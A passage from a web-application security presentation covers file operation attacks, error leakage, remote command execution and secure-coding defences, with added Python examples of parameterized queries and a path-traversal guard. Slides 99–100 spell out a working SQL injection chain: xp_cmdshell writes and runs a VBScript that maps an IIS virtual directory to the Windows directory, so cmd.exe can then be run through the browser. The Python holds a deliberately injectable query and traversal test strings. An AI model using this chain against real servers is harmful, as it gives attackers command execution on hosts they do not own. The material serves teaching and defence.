       • Tighter and secure data access component
       • Usage of database tools like stored procedures, parameterized queries etc.
       • No direct "SELECT" statement from presentation logic.
       • Application role and restricted access.
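The details.asp?id=N lookup that the deck injects, shown both ways as an added example (not the deck's code): the concatenated SELECT beside a parameterized query, and a data access component that validates the id before binding it so the presentation layer never writes SQL. sqlite3 in memory stands in for the store's database; the catalogue rows are constructed.

```python
"""SQL manipulation defense for the details.asp?id=N lookup. Added example."""
import sqlite3
from typing import List, Tuple

Row = Tuple[int, str, float]


def make_db() -> sqlite3.Connection:
    """Constructed catalogue of three DVDs."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE dvds (id INTEGER PRIMARY KEY, title TEXT, price REAL)")
    conn.executemany("INSERT INTO dvds VALUES (?, ?, ?)",
                     [(1, "Beckham", 9.99), (2, "Zhivago", 12.50), (3, "Monsoon", 7.00)])
    conn.commit()
    return conn


def details_vulnerable(conn: sqlite3.Connection, raw_id: str) -> List[Row]:
    """The pattern the deck attacks: presentation code gluing a SELECT together
    from the query string, so the value can become SQL syntax."""
    return conn.execute(f"SELECT id, title, price FROM dvds WHERE id = {raw_id}").fetchall()


def details_parameterized(conn: sqlite3.Connection, raw_id: object) -> List[Row]:
    """Bound parameter: the driver sends the value separately from the statement,
    so '2 OR 1=1' is compared as text against the id column and matches nothing."""
    return conn.execute("SELECT id, title, price FROM dvds WHERE id = ?", (raw_id,)).fetchall()


class DvdRepository:
    """Data access component: the presentation layer calls methods and never
    writes SELECT. Input is checked against the expected type before binding,
    which is the application layer filter from the Defense Strategies slide."""

    def __init__(self, conn: sqlite3.Connection) -> None:
        self._conn = conn

    def details(self, raw_id: str) -> List[Row]:
        if not raw_id.isdigit() or not 0 < int(raw_id) < 10**9:
            raise ValueError("id must be a positive integer")
        return details_parameterized(self._conn, int(raw_id))


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", details_vulnerable(db, "2 OR 1=1"))      # whole catalogue
    print("parameterized:", details_parameterized(db, "2 OR 1=1"))  # nothing
    print("repository:", DvdRepository(db).details("2"))
```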
    85. File Operation
    86. Severity and Damages
       • File access at system level
       • Read access outside the web root
       • Write access on the web root can lead to a higher level of access.
       • Operating system level access.
    87. File Operation Attack Points (diagram: file operation attacks (access to the OS) through forms and query strings; DEMO)
    88. Defense Strategies (diagram: no read operation outside the web root and no write operation to files at the web tier; tight file access object at the middle layer)
    89. Art of Defense
       • Do not access or read files outside the web root.
       • Input filtering and blocking of ../ etc.
       • No path usage or access to files.
       • Never write to files on the web root or internally from the web application.
       • Tighter file access object with defined permissions.
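The rebates.asp?loc=<file> pattern from the profile, handled the way the bullets above ask, as an added example (not the deck's code): one fixed directory, traversal and separator tricks rejected up front, containment checked on the resolved path so symlinks cannot escape either, and read-only access. The sample tree is constructed in a temporary directory.

```python
"""File operation defense for rebates.asp?loc=<file>. Added example."""
import os
import tempfile
from pathlib import Path
from typing import Tuple


class FileAccessDenied(Exception):
    pass


def safe_resolve(base_dir: str, requested: str,
                 allowed_suffixes: Tuple[str, ...] = (".html",)) -> Path:
    """Absolute path of `requested` inside base_dir, or FileAccessDenied."""
    if "\0" in requested:
        raise FileAccessDenied("NUL byte in file name")
    # IIS accepts both separators, so normalise before looking at components.
    parts = requested.replace("\\", "/").split("/")
    if any(part in ("", ".", "..") for part in parts):
        raise FileAccessDenied("absolute paths and ../ are not allowed")
    base = Path(base_dir).resolve()
    candidate = (base / "/".join(parts)).resolve()
    # Containment is decided on the resolved path, not on the string the client sent.
    if base not in candidate.parents:
        raise FileAccessDenied("outside the rebates directory")
    if candidate.suffix.lower() not in allowed_suffixes:
        raise FileAccessDenied("file type not served")
    if not candidate.is_file():
        raise FileAccessDenied("no such page")
    return candidate


def read_rebate_page(web_root: str, loc: str) -> str:
    """Serve <web_root>/rebates/<loc>; the application only ever reads here."""
    path = safe_resolve(os.path.join(web_root, "rebates"), loc)
    with open(path, "r", encoding="utf-8") as fh:
        return fh.read()


def is_denied(web_root: str, loc: str) -> bool:
    try:
        read_rebate_page(web_root, loc)
    except FileAccessDenied:
        return True
    return False


def make_sample_root() -> str:
    """Constructed tree: <tmp>/www/rebates/beckham.html inside the served
    directory, <tmp>/secret.txt outside it, plus a symlink pointing out."""
    tmp = tempfile.mkdtemp()
    rebates = Path(tmp, "www", "rebates")
    rebates.mkdir(parents=True)
    (rebates / "beckham.html").write_text("10% rebate", encoding="utf-8")
    (rebates / "notes.txt").write_text("internal", encoding="utf-8")
    Path(tmp, "secret.txt").write_text("do not serve", encoding="utf-8")
    try:
        os.symlink(os.path.join("..", "..", "secret.txt"), rebates / "link.html")
    except OSError:
        pass  # platforms without symlink support: link.html simply does not exist
    return os.path.join(tmp, "www")


if __name__ == "__main__":
    root = make_sample_root()
    print(read_rebate_page(root, "beckham.html"))
    for loc in ["../../secret.txt", "..\\..\\secret.txt", "/etc/passwd", "link.html"]:
        print(loc, "denied" if is_denied(root, loc) else "served")
```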
    90. Asset to Attack Mapping (same table as slide 63)
    91. Information Leakage, Error / Exception
    92. Error Exception Attack Points (diagram: error/exception attacks through forms and query strings; DEMO)
    93. Information Leakage Attack Points (diagram: information leaks through forms, query strings and paths (include, log etc.))
    94. Defense Strategies (diagram: error text and stack information control at the web tier; tight error and exception handling at the application servers / middle layer)
    95. Art of Defense
       • Proper error handling.
       • Exception handling object.
       • Common logging and auditing
       • Outgoing string controls – errors
       • Stack information control at all levels
       • Forceful error blocking by filtering
       • Internal variables like path and application info should not be part of error messages.
    96. Exploit
    97. Remote Command Execution
       • It is a myth that one cannot get admin/root access from the application layer only
       • One way hacking
       • Command prompts on the web
       • SQL execution from the web
       • Privilege escalation
       • Owning the system
       DEMO
    98. SQL injection
       • What if?
         – You don't know the web root
         – The firewall doesn't allow outbound traffic
         – If you know the web root, it does not provide write rights.
         – You know xp_cmdshell may or may not be working.
       DEMO
    99. SQL injection – Echo the following lines to a file
         Set WshShell = WScript.CreateObject("WScript.Shell")
         Set ObjExec = WshShell.Exec("cmd.exe /c echo %windir%")
         windir = ObjExec.StdOut.ReadLine()
         Set Root = GetObject("IIS://LocalHost/W3SVC/1/ROOT")
         Set Dir = Root.Create("IIsWebVirtualDir", "secret")
         Dir.Path = windir
         Dir.AccessExecute = True
         Dir.SetInfo
       DEMO
    100. SQL injection – Echo the following lines
       • http://target/details.asp?id=1;exec+master..xp_cmdshell+'echo Set WshShell = WScript.CreateObject("WScript.Shell") > c:\secret.vbs'
       • Now run the vbscript: http://target/details.asp?id=1;exec+master..xp_cmdshell+'cscript+c:\secret.vbs'
       • Check: http://target/secret/system32/cmd.exe?+/c+set
       DEMO
    101. Art of Defense by Secure Coding, Code Reviews
    102. Defense strategies
       • Layers of validation.
       • Do not trust inputs.
       • Source code review at the presentation layer
       • Analyzing variables and input trails
       • Impact analysis with assumed inputs
       • Security functions common to applications
       • Session management and cookie coding
    103. Defense strategies
       • No hard-coded secrets
       • No plain secrets in code, memory, config files or database
       • Common error object and a powerful exception handling model
       • OS level exec calls should be filtered
       • Message passing objects from presentation to business logic should be filtered
    104. Defense strategies
       • Array bounds checked
       • Max/min controlled
       • File access path and decisions should not be based on the filename etc.
    105. Defense strategies
       • On .NET one can use the IHttpModule interface
       • Validation up in the HTTP pipeline
       • Only valid requests go in
       • Variables can be locked down
    106. Thanks!
       shreeraj@net-square.com
       http://www.net-square.com
       New tool for web services: http://www.net-square.com/wschess/
